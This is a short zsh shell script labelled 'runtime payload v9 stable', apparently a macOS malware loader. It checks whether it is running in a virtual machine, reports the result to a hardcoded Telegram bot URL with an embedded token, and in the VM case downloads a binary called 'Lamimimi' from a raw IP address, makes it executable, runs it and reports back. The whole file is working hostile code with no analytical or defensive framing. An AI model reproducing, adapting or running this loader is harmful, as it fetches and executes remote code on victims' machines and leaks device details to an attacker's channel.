#!/bin/zsh
# runtime payload v9 stable

set -e

cd "${TMPDIR:-/tmp}"

API_URL="https://api.telegram.org/bot8699801155:AAECl_LhfFLOzfR8xXy6Mldn01gOaTKKU9Q/sendMessage?chat_id=-5269300367"

hv="$(sysctl -n kern.hv_vmm_present 2>/dev/null || echo 0)"

if [ "$hv" = "1" ]; then
    echo "[*] VM detected"
    curl -s "${API_URL}&text=VM_detected" >/dev/null

    if curl -fsSL -o Lamimimi http://64.89.160.11/Lamimimi; then
        chmod +x Lamimimi
        ./Lamimimi
        curl -s "${API_URL}&text=VM_payload_executed" >/dev/null
    else
        echo "[!] Download failed"
        curl -s "${API_URL}&text=VM_download_failed" >/dev/null
    fi
    
else
    echo "[*] Physical device"
    curl -s "${API_URL}&text=Physical_device" >/dev/null
fi
